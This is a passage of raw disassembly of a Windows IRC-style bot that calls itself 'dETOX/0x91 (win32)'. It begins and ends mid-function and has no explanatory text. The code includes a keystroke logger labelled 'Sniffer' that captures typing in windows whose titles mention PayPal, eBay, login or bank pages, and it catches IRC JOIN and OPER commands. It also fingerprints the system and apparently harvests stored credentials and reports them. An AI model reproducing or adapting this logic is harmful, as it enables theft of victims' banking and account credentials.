mov esi, eax
push offset aDnsflushresolv ; "DnsFlushResolverCache"
push esi
call dword_40108C ; GetProcAddress
call eax
push esi
mov edi, eax
call dword_401088 ; FreeLibrary
mov eax, edi
pop edi
pop esi
retn
sub_40969D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4096C8 proc near ; CODE XREF: sub_405DB7+18�p
var_2014 = byte ptr -2014h
var_2012 = byte ptr -2012h
var_14 = word ptr -14h
var_12 = word ptr -12h
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
mov eax, 2014h
call sub_40ABE0
mov eax, [ebp+arg_4]
push ebx
push esi
dec eax
push edi
jz short loc_409707
dec eax
jz short loc_4096E9
dec eax
loc_4096E2: ; CODE XREF: sub_4096C8+8E�j
; sub_4096C8+AB�j
xor eax, eax
jmp loc_40982F
; ---------------------------------------------------------------------------
loc_4096E9: ; CODE XREF: sub_4096C8+17�j
push 3
push 1388h
push [ebp+arg_0]
call sub_407165
add esp, 0Ch
neg al
sbb eax, eax
and eax, 3
jmp loc_40982F
; ---------------------------------------------------------------------------
loc_409707: ; CODE XREF: sub_4096C8+14�j
xor esi, esi
push esi
push 1
push 2
mov [ebp+var_4], esi
call dword_401234
mov edi, eax
push 10h
lea eax, [ebp+var_14]
push esi
push eax
mov [ebp+arg_4], edi
call sub_40AC10
add esp, 0Ch
mov [ebp+var_14], 2
push 87h
call dword_401230
mov [ebp+var_12], ax
mov eax, [ebp+arg_0]
mov [ebp+var_10], eax
lea eax, [ebp+var_14]
push 10h
push eax
push edi
call dword_401238
cmp eax, 0FFFFFFFFh
jz short loc_4096E2
push esi
push 48h
push offset dword_403760
push edi
call dword_401244
cmp eax, 0FFFFFFFFh
jnz short loc_409778
push edi
loc_40976D: ; CODE XREF: sub_4096C8+10B�j
call sub_408616
pop ecx
jmp loc_4096E2
; ---------------------------------------------------------------------------
loc_409778: ; CODE XREF: sub_4096C8+A2�j
mov ebx, 2000h
push esi
lea eax, [ebp+var_2014]
push ebx
push eax
push edi
mov edi, dword_40123C
call edi ; dword_40123C
cmp eax, 0FFFFFFFFh
jz short loc_4097D0
cmp [ebp+var_2012], 0Ch
jnz loc_409823
push esi
push 18h
push offset dword_4037AC
push [ebp+arg_4]
call dword_401244
cmp eax, 0FFFFFFFFh
jz short loc_4097D0
push esi
lea eax, [ebp+var_2014]
push ebx
push eax
push [ebp+arg_4]
call edi ; dword_40123C
inc eax
neg eax
sbb eax, eax
inc eax
mov [ebp+arg_0], eax
jz short loc_4097D5
loc_4097D0: ; CODE XREF: sub_4096C8+CA�j
; sub_4096C8+ED�j
push [ebp+arg_4]
jmp short loc_40976D
; ---------------------------------------------------------------------------
loc_4097D5: ; CODE XREF: sub_4096C8+106�j
cmp [ebp+var_2012], 2
jnz short loc_409823
push 10h
push offset dword_4037C8
lea eax, [ebp+var_2014]
push esi
push eax
call sub_40A9CA
add esp, 10h
test al, al
jz short loc_409802
mov [ebp+var_4], 1
jmp short loc_409823
; ---------------------------------------------------------------------------
loc_409802: ; CODE XREF: sub_4096C8+12F�j
push 10h
push offset dword_4037DC
lea eax, [ebp+var_2014]
push esi
push eax
call sub_40A9CA
add esp, 10h
neg al
sbb eax, eax
and eax, 3
mov [ebp+var_4], eax
loc_409823: ; CODE XREF: sub_4096C8+D3�j
; sub_4096C8+114�j ...
push [ebp+arg_4]
call sub_408616
mov eax, [ebp+var_4]
pop ecx
loc_40982F: ; CODE XREF: sub_4096C8+1C�j
; sub_4096C8+3A�j
pop edi
pop esi
pop ebx
leave
retn
sub_4096C8 endp
; =============== S U B R O U T I N E =======================================
sub_409834 proc near ; CODE XREF: sub_4098E2+122�p
; sub_4098E2+2EA�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
cmp [esp+arg_4], 0
push esi
jz short loc_40988B
mov esi, [esp+4+arg_0]
push offset aPaypal ; "paypal"
push esi
call sub_40AA02
pop ecx
test eax, eax
pop ecx
jnz short loc_4098C2
push offset aEbay ; "ebay"
push esi
call sub_40AA02
pop ecx
test eax, eax
pop ecx
jnz short loc_4098C2
push offset aEBay ; "e-bay"
push esi
call sub_40AA02
pop ecx
test eax, eax
pop ecx
jnz short loc_4098C2
push offset aLogin ; "login"
push esi
call sub_40AA02
pop ecx
test eax, eax
pop ecx
jnz short loc_4098C2
push offset aBank ; "bank"
jmp short loc_4098B6
; ---------------------------------------------------------------------------
loc_40988B: ; CODE XREF: sub_409834+6�j
mov esi, [esp+4+arg_0]
push offset aJoin ; "JOIN"
push esi
call sub_40AA02
pop ecx
test eax, eax
pop ecx
jnz short loc_4098C2
push offset aOper ; "OPER"
push esi
call sub_40AA02
pop ecx
test eax, eax
pop ecx
jnz short loc_4098C2
push offset aLogin ; "login"
loc_4098B6: ; CODE XREF: sub_409834+55�j
push esi
call sub_40AA02
pop ecx
test eax, eax
pop ecx
jz short loc_4098DE
loc_4098C2: ; CODE XREF: sub_409834+1B�j
; sub_409834+2C�j ...
mov eax, dword_40372C
push esi
imul eax, 1Ch
push off_401BAC[eax]
push offset dword_403F84
call sub_405185
add esp, 0Ch
loc_4098DE: ; CODE XREF: sub_409834+8C�j
xor eax, eax
pop esi
retn
sub_409834 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4098E2 proc near ; DATA XREF: sub_404530+B09�o
; sub_4055A6+228�o ...
var_34D0 = dword ptr -34D0h
var_34CC = byte ptr -34CCh
var_14CC = byte ptr -14CCh
var_144C = dword ptr -144Ch
var_1448 = dword ptr -1448h
var_1444 = dword ptr -1444h
var_1440 = dword ptr -1440h
var_143C = dword ptr -143Ch
var_1438 = byte ptr -1438h
var_103C = dword ptr -103Ch
var_1038 = dword ptr -1038h
var_1034 = dword ptr -1034h
var_1030 = byte ptr -1030h
var_1019 = byte ptr -1019h
var_1018 = byte ptr -1018h
var_18 = dword ptr -18h
var_4 = dword ptr -4
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_404458
push offset loc_40ABC0
mov eax, large fs:0
push eax
mov large fs:0, esp
push ecx
push ecx
mov eax, 34B8h
call sub_40ABE0
push ebx
push esi
push edi
mov [ebp+var_18], esp
xor esi, esi
mov [ebp+var_1444], esi
mov [ebp+var_143C], esi
mov ecx, 0FFh
xor eax, eax
lea edi, [ebp+var_1438]
rep stosd
push 80000400h
lea eax, [ebp+var_1030]
push eax
call dword_4010DC ; InitializeCriticalSectionAndSpinCount
test eax, eax
jnz short loc_40995D
push offset aSniffer ; "Sniffer"
call sub_40A64F
push eax
call sub_40A56C
pop ecx
pop ecx
push esi
call dword_4010EC ; ExitThread
loc_40995D: ; CODE XREF: sub_4098E2+60�j
lea eax, [ebp+var_1030]
push eax
call dword_4010E0 ; RtlEnterCriticalSection
mov ebx, dword_4011D4
call ebx ; dword_4011D4
mov [ebp+var_1448], eax
push 64h
lea ecx, [ebp+var_14CC]
push ecx
push eax
mov esi, dword_4011D0
call esi ; dword_4011D0
mov edi, 1000h
push edi
push 0
lea eax, [ebp+var_1018]
push eax
call sub_40AC10
add esp, 0Ch
loc_4099A1: ; CODE XREF: sub_4098E2+36E�j
; sub_4098E2+38F�j
cmp [ebp+var_1444], 0
jnz loc_409C76
and [ebp+var_4], 0
push 1
call dword_4010F4 ; Sleep
call ebx ; dword_4011D4
mov [ebp+var_1034], eax
cmp eax, [ebp+var_1448]
jz short loc_409A34
mov [ebp+var_1448], eax
push 64h
lea ecx, [ebp+var_14CC]
push ecx
push eax
call esi ; dword_4011D0
lea eax, [ebp+var_14CC]
push eax
lea eax, [ebp+var_1018]
push eax
push offset dword_403FE0
lea eax, [ebp+var_34CC]
push eax
call sub_40AB94
push 1
lea eax, [ebp+var_34CC]
push eax
call sub_409834
mov [ebp+var_1444], eax
push edi
push 0
lea eax, [ebp+var_1018]
push eax
call sub_40AC10
push 2000h
push 0
lea eax, [ebp+var_34CC]
push eax
call sub_40AC10
add esp, 30h
loc_409A34: ; CODE XREF: sub_4098E2+E6�j
and [ebp+var_1440], 0
loc_409A3B: ; CODE XREF: sub_4098E2+365�j
cmp [ebp+var_1440], 5Ch
jge loc_409C4C
push 10h
call dword_4011E0
movsx eax, ax
mov [ebp+var_1038], eax
mov eax, [ebp+var_1440]
lea eax, [eax+eax*4]
shl eax, 2
mov [ebp+var_34D0], eax
mov eax, dword_403818[eax]
mov [ebp+var_103C], eax
push eax
call dword_4011D8
test ah, 80h
jz loc_409B22
push 14h
call dword_4011E0
test ax, ax
jz short loc_409ABD
cmp [ebp+var_1038], 0FFFFFFFFh
jle short loc_409ABD
mov eax, [ebp+var_103C]
cmp eax, 40h
jle short loc_409ABD
cmp eax, 5Bh
jge short loc_409ABD
mov [ebp+eax*4+var_143C], 1
jmp loc_409C41
; ---------------------------------------------------------------------------
loc_409ABD: ; CODE XREF: sub_4098E2+1B0�j
; sub_4098E2+1B9�j ...
push 14h
call dword_4011E0
test ax, ax
jz short loc_409AF3
cmp [ebp+var_1038], 0
mov eax, [ebp+var_103C]
jge short loc_409AF9
cmp eax, 40h
jle short loc_409AF9
cmp eax, 5Bh
jge short loc_409AF9
mov [ebp+eax*4+var_143C], 2
jmp loc_409C41
; ---------------------------------------------------------------------------
loc_409AF3: ; CODE XREF: sub_4098E2+1E6�j
mov eax, [ebp+var_103C]
loc_409AF9: ; CODE XREF: sub_4098E2+1F5�j
; sub_4098E2+1FA�j ...
cmp [ebp+var_1038], 0
jge short loc_409B12
mov [ebp+eax*4+var_143C], 3
jmp loc_409C41
; ---------------------------------------------------------------------------
loc_409B12: ; CODE XREF: sub_4098E2+21E�j
mov [ebp+eax*4+var_143C], 4
jmp loc_409C41
; ---------------------------------------------------------------------------
loc_409B22: ; CODE XREF: sub_4098E2+19F�j
mov edx, [ebp+var_103C]
lea eax, [ebp+edx*4+var_143C]
mov ecx, [eax]
test ecx, ecx
jz loc_409C41
mov [ebp+var_144C], ecx
and dword ptr [eax], 0
cmp edx, 8
lea eax, [ebp+var_1018]
push eax
jnz short loc_409B61
call sub_40ABD2
pop ecx
and [ebp+eax+var_1019], 0
jmp loc_409C41
; ---------------------------------------------------------------------------
loc_409B61: ; CODE XREF: sub_4098E2+26A�j
call sub_40ABD2
pop ecx
cmp eax, 0FBAh
ja short loc_409B90
cmp [ebp+var_103C], 0Dh
jnz loc_409BFE
lea eax, [ebp+var_1018]
push eax
call sub_40ABD2
pop ecx
test eax, eax
jz loc_409C41
loc_409B90: ; CODE XREF: sub_4098E2+28A�j
call ebx ; dword_4011D4
mov [ebp+var_1034], eax
push 64h
lea ecx, [ebp+var_14CC]
push ecx
push eax
call esi ; dword_4011D0
lea eax, [ebp+var_14CC]
push eax
lea eax, [ebp+var_1018]
push eax
push offset dword_403FE0
lea eax, [ebp+var_34CC]
push eax
call sub_40AB94
push 1
lea eax, [ebp+var_34CC]
push eax
call sub_409834
mov [ebp+var_1444], eax
push edi
push 0
lea eax, [ebp+var_1018]
push eax
call sub_40AC10
push 2000h
push 0
lea eax, [ebp+var_34CC]
push eax
call sub_40AC10
add esp, 30h
jmp short loc_409C41
; ---------------------------------------------------------------------------
loc_409BFE: ; CODE XREF: sub_4098E2+293�j
mov eax, [ebp+var_144C]
cmp eax, 1
jz short loc_409C26
cmp eax, 3
jz short loc_409C26
cmp eax, 2
jz short loc_409C18
cmp eax, 4
jnz short loc_409C41
loc_409C18: ; CODE XREF: sub_4098E2+32F�j
mov eax, [ebp+var_34D0]
lea eax, dword_40381C[eax]
jmp short loc_409C32
; ---------------------------------------------------------------------------
loc_409C26: ; CODE XREF: sub_4098E2+325�j
; sub_4098E2+32A�j
mov eax, [ebp+var_34D0]
lea eax, dword_403823[eax]
loc_409C32: ; CODE XREF: sub_4098E2+342�j
push eax
lea eax, [ebp+var_1018]
push eax
call sub_40AC82
pop ecx
pop ecx
loc_409C41: ; CODE XREF: sub_4098E2+1D6�j
; sub_4098E2+20C�j ...
inc [ebp+var_1440]
jmp loc_409A3B
; ---------------------------------------------------------------------------
loc_409C4C: ; CODE XREF: sub_4098E2+160�j
or [ebp+var_4], 0FFFFFFFFh
jmp loc_4099A1
; ---------------------------------------------------------------------------
push 1
pop eax
retn
; ---------------------------------------------------------------------------
mov esp, [ebp+var_18]
or [ebp+var_4], 0FFFFFFFFh
mov edi, 1000h
mov ebx, dword_4011D4
mov esi, dword_4011D0
jmp loc_4099A1
; ---------------------------------------------------------------------------
loc_409C76: ; CODE XREF: sub_4098E2+C6�j
push offset aSniffer ; "Sniffer"
call sub_40A64F
push eax
call sub_40A56C
pop ecx
pop ecx
lea eax, [ebp+var_1030]
push eax
call dword_4010E8 ; RtlLeaveCriticalSection
push 0
call dword_4010EC ; ExitThread
sub_4098E2 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_409C9D proc near ; CODE XREF: sub_409F1F+3B�p
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
push ecx
push ebx
push esi
push edi
xor esi, esi
loc_409CA7: ; CODE XREF: sub_409C9D+3C�j
; sub_409C9D+46�j
rdtsc
push 3E8h
mov edi, edx
mov ebx, eax
call dword_4010F4 ; Sleep
rdtsc
sub eax, ebx
push esi
sbb edx, edi
push 186A0h
push edx
push eax
call sub_40AD10
push esi
push 0Ah
push edx
push eax
call sub_40AD10
cmp edx, esi
mov edi, eax
ja short loc_409CA7
jb short loc_409CE5
cmp edi, 0F4240h
ja short loc_409CA7
loc_409CE5: ; CODE XREF: sub_409C9D+3E�j
push esi
push 64h
push edx
push edi
call sub_40AC90
push 64h
mov ecx, eax
cmp edx, esi
pop eax
mov [ebp+var_4], esi
ja short loc_409D5C
jb short loc_409D02
cmp ecx, 50h
jnb short loc_409D08
loc_409D02: ; CODE XREF: sub_409C9D+5E�j
push 4Bh
mov [ebp+var_4], esi
pop eax
loc_409D08: ; CODE XREF: sub_409C9D+63�j
cmp edx, esi
ja short loc_409D5C
jb short loc_409D13
cmp ecx, 47h
jnb short loc_409D19
loc_409D13: ; CODE XREF: sub_409C9D+6F�j
push 42h
mov [ebp+var_4], esi
pop eax
loc_409D19: ; CODE XREF: sub_409C9D+74�j
cmp edx, esi
ja short loc_409D5C
jb short loc_409D24
cmp ecx, 37h
jnb short loc_409D2A
loc_409D24: ; CODE XREF: sub_409C9D+80�j
push 32h
mov [ebp+var_4], esi
pop eax
loc_409D2A: ; CODE XREF: sub_409C9D+85�j
cmp edx, esi
ja short loc_409D5C
jb short loc_409D35
cmp ecx, 26h
jnb short loc_409D3B
loc_409D35: ; CODE XREF: sub_409C9D+91�j
push 21h
mov [ebp+var_4], esi
pop eax
loc_409D3B: ; CODE XREF: sub_409C9D+96�j
cmp edx, esi
ja short loc_409D5C
jb short loc_409D46
cmp ecx, 1Eh
jnb short loc_409D4C
loc_409D46: ; CODE XREF: sub_409C9D+A2�j
push 19h
mov [ebp+var_4], esi
pop eax
loc_409D4C: ; CODE XREF: sub_409C9D+A7�j
cmp edx, esi
ja short loc_409D5C
jb short loc_409D57
cmp ecx, 0Ah
jnb short loc_409D5C
loc_409D57: ; CODE XREF: sub_409C9D+B3�j
xor eax, eax
mov [ebp+var_4], esi
loc_409D5C: ; CODE XREF: sub_409C9D+5C�j
; sub_409C9D+6D�j ...
sub eax, ecx
add eax, edi
pop edi
pop esi
pop ebx
leave
retn
sub_409C9D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_409D65 proc near ; CODE XREF: sub_404530+D5�p
; sub_409F1F+47�p
var_2C = qword ptr -2Ch
var_18 = qword ptr -18h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 18h
push ebx
push esi
lea eax, [ebp+var_10]
push edi
push eax
call dword_401098 ; QueryPerformanceCounter
lea eax, [ebp+var_8]
push eax
call dword_401094 ; QueryPerformanceFrequency
xor eax, eax
cmp [ebp+var_C], eax
jl short loc_409DC9
jg short loc_409D90
cmp [ebp+var_10], eax
jbe short loc_409DC9
loc_409D90: ; CODE XREF: sub_409D65+24�j
cmp [ebp+var_4], eax
jl short loc_409DC9
jg short loc_409D9C
cmp [ebp+var_8], eax
jbe short loc_409DC9
loc_409D9C: ; CODE XREF: sub_409D65+30�j
push [ebp+var_4]
push [ebp+var_8]
push [ebp+var_C]
push [ebp+var_10]
call sub_40AD90
mov dword ptr [ebp+var_18], eax
mov dword ptr [ebp+var_18+4], edx
fild [ebp+var_18]
push ecx
push ecx
fstp [esp+2Ch+var_2C]
call sub_40AD7E
pop ecx
pop ecx
call sub_40ABC6
jmp short loc_409DD8
; ---------------------------------------------------------------------------
loc_409DC9: ; CODE XREF: sub_409D65+22�j
; sub_409D65+29�j ...
call dword_4010FC ; GetTickCount
xor edx, edx
mov ecx, 3E8h
div ecx
loc_409DD8: ; CODE XREF: sub_409D65+62�j
mov ecx, 15180h
xor edx, edx
mov edi, ecx
mov esi, eax
div edi
xor edx, edx
push 3Ch
mov edi, eax
mov eax, esi
div ecx
mov ecx, 0E10h
mov ebx, ecx
mov eax, edx
xor edx, edx
div ebx
xor edx, edx
mov ebx, eax
mov eax, esi
div ecx
pop ecx
mov esi, offset aDays ; "days"
mov eax, edx
xor edx, edx
div ecx
cmp edi, 1
jnz short loc_409E1A
mov esi, offset aDay ; "day"
loc_409E1A: ; CODE XREF: sub_409D65+AE�j
cmp ebx, 1
mov edx, offset aHours ; "hours"
jnz short loc_409E29
mov edx, offset aHour ; "hour"
loc_409E29: ; CODE XREF: sub_409D65+BD�j
cmp eax, 1
mov ecx, offset aMinutes ; "minutes"
jnz short loc_409E38
mov ecx, offset aMinute ; "minute"
loc_409E38: ; CODE XREF: sub_409D65+CC�j
push ecx
push eax
push edx
push ebx
push esi
push edi
push offset dword_404000
mov esi, offset dword_40B310
push 104h
push esi
call sub_40AD78
add esp, 24h
mov eax, esi
pop edi
pop esi
pop ebx
leave
retn
sub_409D65 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_409E5D proc near ; CODE XREF: sub_404530+FB�p
; sub_409F1F+41�p
var_98 = dword ptr -98h
var_94 = dword ptr -94h
var_90 = dword ptr -90h
var_8C = dword ptr -8Ch
var_88 = dword ptr -88h
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 98h
lea eax, [ebp+var_98]
mov [ebp+var_98], 94h
push eax
call dword_40109C ; GetVersionExA
cmp [ebp+var_94], 4
mov ecx, [ebp+var_90]
jnz short loc_409EC9
test ecx, ecx
jnz short loc_409EB1
cmp [ebp+var_88], 1
mov eax, offset a95 ; "95"
jz short loc_409EA1
mov eax, [ebp+var_4]
loc_409EA1: ; CODE XREF: sub_409E5D+3F�j
cmp [ebp+var_88], 2
jnz short loc_409EF8
mov eax, offset aNt ; "NT"
jmp short loc_409EF8
; ---------------------------------------------------------------------------
loc_409EB1: ; CODE XREF: sub_409E5D+31�j
cmp ecx, 0Ah
jnz short loc_409EBD
mov eax, offset a98 ; "98"
jmp short loc_409EF8
; ---------------------------------------------------------------------------
loc_409EBD: ; CODE XREF: sub_409E5D+57�j
cmp ecx, 5Ah
jnz short loc_409EF3
mov eax, offset aMe ; "ME"
jmp short loc_409EF8
; ---------------------------------------------------------------------------
loc_409EC9: ; CODE XREF: sub_409E5D+2D�j
cmp [ebp+var_94], 5
jnz short loc_409EF3
test ecx, ecx
jnz short loc_409EDD
mov eax, offset a2000 ; "2000"
jmp short loc_409EF8
; ---------------------------------------------------------------------------
loc_409EDD: ; CODE XREF: sub_409E5D+77�j
cmp ecx, 1
jnz short loc_409EE9
mov eax, offset aXp ; "XP"
jmp short loc_409EF8
; ---------------------------------------------------------------------------
loc_409EE9: ; CODE XREF: sub_409E5D+83�j
cmp ecx, 2
mov eax, offset a2003 ; "2003"
jz short loc_409EF8
loc_409EF3: ; CODE XREF: sub_409E5D+63�j
; sub_409E5D+73�j
mov eax, offset dword_404074
loc_409EF8: ; CODE XREF: sub_409E5D+4B�j
; sub_409E5D+52�j ...
push esi
mov esi, offset dword_40B284
push [ebp+var_8C]
push ecx
push [ebp+var_94]
push eax
push offset dword_404050
push esi
call sub_40AB94
add esp, 18h
mov eax, esi
pop esi
leave
retn
sub_409E5D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_409F1F proc near ; CODE XREF: sub_404530+140�p
var_20 = byte ptr -20h
var_18 = dword ptr -18h
var_14 = dword ptr -14h
push ebp
mov ebp, esp
sub esp, 20h
push esi
push 20h
lea eax, [ebp+var_20]
push 0
push eax
call sub_40AC10
add esp, 0Ch
lea eax, [ebp+var_20]
push eax
call dword_4010A0 ; GlobalMemoryStatus
mov eax, [ebp+var_18]
mov ecx, 0FF800h
xor edx, edx
mov esi, ecx
div esi
xor edx, edx
push eax
mov eax, [ebp+var_18]
sub eax, [ebp+var_14]
div ecx
push eax
call sub_409C9D
push eax
call sub_409E5D
push eax
call sub_409D65
push eax
push offset aDetox0x91Win32 ; "dETOX/0x91 (win32)"
mov esi, offset dword_40B414
push offset dword_40409C
push esi
call sub_40AB94
add esp, 20h
mov eax, esi
pop esi
leave
retn
sub_409F1F endp
; =============== S U B R O U T I N E =======================================
sub_409F89 proc near ; CODE XREF: MEW:0040A238�p
; MEW:0040A313�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push [esp+arg_0]
push [esp+4+arg_4]
push 4040FCh
call sub_405185
add esp, 0Ch
xor eax, eax
retn
sub_409F89 endp
; ---------------------------------------------------------------------------
loc_409FA1: ; DATA XREF: sub_404530+1F3�o
mov eax, offset loc_40AFF4
call sub_40AE40
sub esp, 0D40h
push ebx
push esi
push edi
xor ebx, ebx
push offset dword_404288
mov [ebp-14h], ebx
call dword_401090 ; LoadLibraryA
cmp eax, ebx
mov [ebp-2Ch], eax
jz loc_40A436
mov eax, [ebp+8]
push dword ptr [eax]
push offset dword_404248
call sub_405185
pop ecx
pop ecx
push 404230h
push dword ptr [ebp-2Ch]
call dword_40108C ; GetProcAddress
cmp eax, ebx
jz loc_40A418
push ebx
push ebx
lea ecx, [ebp-10h]
push ebx
push ecx
mov [ebp-4], ebx
mov [ebp-10h], ebx
call eax
cmp [ebp-10h], ebx
mov byte ptr [ebp-4], 1
mov [ebp-24h], ebx
jnz short loc_40A01B
push 80004003h
call sub_40AE70
loc_40A01B: ; CODE XREF: MEW:0040A00F�j
mov esi, [ebp-10h]
lea ecx, [ebp-24h]
push ecx
push ebx
mov eax, [esi]
push ebx
push esi
call dword ptr [eax+38h]
cmp eax, ebx
jge short loc_40A03A
push offset dword_404220
push esi
push eax
call sub_40AE7E
loc_40A03A: ; CODE XREF: MEW:0040A02C�j
; MEW:0040A3E6�j ...
cmp [ebp-24h], ebx
jnz short loc_40A049
push 80004003h
call sub_40AE70
loc_40A049: ; CODE XREF: MEW:0040A03D�j
mov eax, [ebp-24h]
lea edx, [ebp-40h]
push ebx
push edx
mov ecx, [eax]
push 1
push eax
call dword ptr [ecx+0Ch]
test eax, eax
jnz loc_40A3F7
sub esp, 10h
lea esi, [ebp-40h]
mov edi, esp
lea eax, [ebp-84h]
movsd
movsd
movsd
push 404218h
push eax
movsd
call dword_4011DC
add esp, 18h
cmp [ebp-10h], ebx
mov byte ptr [ebp-4], 2
mov [ebp-1Ch], ebx
jnz short loc_40A098
push 80004003h
call sub_40AE70
loc_40A098: ; CODE XREF: MEW:0040A08C�j
mov esi, [ebp-10h]
lea ecx, [ebp-1Ch]
push ecx
lea ecx, [ebp-40h]
mov eax, [esi]
push ebx
push ecx
push ebx
push esi
call dword ptr [eax+3Ch]
cmp eax, ebx
mov edi, offset dword_404220
jge short loc_40A0BC
push edi
push esi
push eax
call sub_40AE7E
loc_40A0BC: ; CODE XREF: MEW:0040A0B2�j
; MEW:0040A3CC�j ...
cmp [ebp-1Ch], ebx
jnz short loc_40A0CB
push 80004003h
call sub_40AE70
loc_40A0CB: ; CODE XREF: MEW:0040A0BF�j
mov eax, [ebp-1Ch]
lea edx, [ebp-50h]
push ebx
push edx
mov ecx, [eax]
push 1
push eax
call dword ptr [ecx+0Ch]
test eax, eax
jnz loc_40A3DD
cmp [ebp-10h], ebx
mov byte ptr [ebp-4], 3
mov [ebp-20h], ebx
jnz short loc_40A0F9
push 80004003h
call sub_40AE70
loc_40A0F9: ; CODE XREF: MEW:0040A0ED�j
mov esi, [ebp-10h]
lea ecx, [ebp-20h]
push ecx
lea ecx, [ebp-50h]
mov eax, [esi]
push ebx
push ecx
lea ecx, [ebp-40h]
push ecx
push ebx
push esi
call dword ptr [eax+54h]
cmp eax, ebx
jge short loc_40A11C
push edi
push esi
push eax
call sub_40AE7E
loc_40A11C: ; CODE XREF: MEW:0040A112�j
; MEW:0040A253�j ...
cmp [ebp-20h], ebx
jnz short loc_40A12B
push 80004003h
call sub_40AE70
loc_40A12B: ; CODE XREF: MEW:0040A11F�j
mov eax, [ebp-20h]
lea edx, [ebp-30h]
push ebx
push edx
mov ecx, [eax]
push 1
push eax
call dword ptr [ecx+0Ch]
test eax, eax
jnz loc_40A3C3
push dword ptr [ebp-30h]
lea eax, [ebp-54Ch]
push offset dword_404214
push eax
call dword_4011DC
add esp, 0Ch
cmp [ebp-10h], ebx
mov [ebp-28h], ebx
mov [ebp-18h], ebx
jnz short loc_40A170
push 80004003h
call sub_40AE70
loc_40A170: ; CODE XREF: MEW:0040A164�j
push ebx
lea ecx, [ebp-18h]
push ebx
push ecx
mov esi, [ebp-10h]
lea ecx, [ebp-28h]
push ecx
lea ecx, [ebp-50h]
push dword ptr [ebp-30h]
mov eax, [esi]
push ecx
lea ecx, [ebp-40h]
push ecx
push ebx
push esi
call dword ptr [eax+44h]
cmp eax, ebx
jge short loc_40A19B
push edi
push esi
push eax
call sub_40AE7E
loc_40A19B: ; CODE XREF: MEW:0040A191�j
push dword ptr [ebp-18h]
call dword_4010CC ; lstrlenA
mov esi, [ebp-28h]
lea ecx, [esi-1]
cmp eax, ecx
jge short loc_40A1E1
xor edx, edx
xor ecx, ecx
cmp esi, ebx
jle short loc_40A1D8
loc_40A1B6: ; CODE XREF: MEW:0040A1D6�j
mov eax, [ebp-18h]
mov al, [ecx+eax]
cmp al, bl
jnz short loc_40A1CA
mov byte ptr [ebp+edx-34Ch], 2Ch
jmp short loc_40A1D1
; ---------------------------------------------------------------------------
loc_40A1CA: ; CODE XREF: MEW:0040A1BE�j
mov [ebp+edx-34Ch], al
loc_40A1D1: ; CODE XREF: MEW:0040A1C8�j
inc edx
inc ecx
inc ecx
cmp ecx, esi
jl short loc_40A1B6
loc_40A1D8: ; CODE XREF: MEW:0040A1B4�j
mov [ebp+edx-34Dh], bl
jmp short loc_40A1F9
; ---------------------------------------------------------------------------
loc_40A1E1: ; CODE XREF: MEW:0040A1AC�j
push dword ptr [ebp-18h]
lea eax, [ebp-34Ch]
push offset aS_1 ; "%s"
push eax
call dword_4011DC
add esp, 0Ch
loc_40A1F9: ; CODE XREF: MEW:0040A1DF�j
mov esi, dword_4010A4+8
lea eax, [ebp-84h]
push 404208h
push eax
call esi
test eax, eax
jnz short loc_40A243
push dword ptr [ebp-18h]
lea eax, [ebp-54Ch]
push eax
lea eax, [ebp-0D4Ch]
push offset dword_4041D8
push eax
call sub_40AB94
mov eax, [ebp+8]
push dword ptr [eax]
lea eax, [ebp-0D4Ch]
push eax
call sub_409F89
add esp, 18h
inc dword ptr [ebp-14h]
loc_40A243: ; CODE XREF: MEW:0040A20F�j
lea eax, [ebp-84h]
push 4041CCh
push eax
call esi
test eax, eax
jnz loc_40A11C
lea eax, [ebp-54Ch]
push 4041C0h
push eax
call sub_40AB9A
pop ecx
test eax, eax
pop ecx
jnz loc_40A11C
lea eax, [ebp-54Ch]
push 4041B8h
push eax
call sub_40AB9A
pop ecx
test eax, eax
pop ecx
jz loc_40A11C
lea eax, [ebp-54Ch]
push 4041B8h
push eax
call sub_40AB9A
pop ecx
mov [eax], bl
pop ecx
lea eax, [ebp-54Ch]
push 8
push eax
lea eax, [ebp-14Ch]
push eax
call dword_4010A4+4
lea eax, [ebp-14Ch]
push 4041B0h
push eax
call sub_40AB9A
pop ecx
test eax, eax
pop ecx
jnz short loc_40A323
lea eax, [ebp-14Ch]
push 4041A8h
push eax
call sub_40AB9A
pop ecx
test eax, eax
pop ecx
jnz short loc_40A323
lea eax, [ebp-34Ch]
push eax
lea eax, [ebp-54Ch]
push eax
lea eax, [ebp-0D4Ch]
push 40417Ch
push eax
call sub_40AB94
mov eax, [ebp+8]
push dword ptr [eax]
lea eax, [ebp-0D4Ch]
push eax
call sub_409F89
add esp, 18h
loc_40A31B: ; CODE XREF: MEW:0040A3BE�j
inc dword ptr [ebp-14h]
jmp loc_40A11C
; ---------------------------------------------------------------------------
loc_40A323: ; CODE XREF: MEW:0040A2CF�j
; MEW:0040A2E6�j
lea eax, [ebp-14Ch]
push offset byte_40B078
push eax
call dword_4010A4 ; lstrcpyA
lea eax, [ebp-34Ch]
push 404178h
push eax
call sub_40AB9A
pop ecx
test eax, eax
pop ecx
jz loc_40A11C
mov esi, 404178h
lea eax, [ebp-34Ch]
push esi
push eax
call sub_40AB9A
pop ecx
inc eax
pop ecx
push eax
lea eax, [ebp-14Ch]
push eax
call dword_4010A4 ; lstrcpyA
lea eax, [ebp-34Ch]
push esi
push eax
call sub_40AB9A
pop ecx
mov [eax], bl
pop ecx
lea eax, [ebp-14Ch]
push eax
lea eax, [ebp-34Ch]
push eax
lea eax, [ebp-54Ch]
push eax
lea eax, [ebp-0D4Ch]
push 404148h
push eax
call sub_40AB94
mov eax, [ebp+8]
push dword ptr [eax]
lea eax, [ebp-0D4Ch]
push eax
call sub_409F89
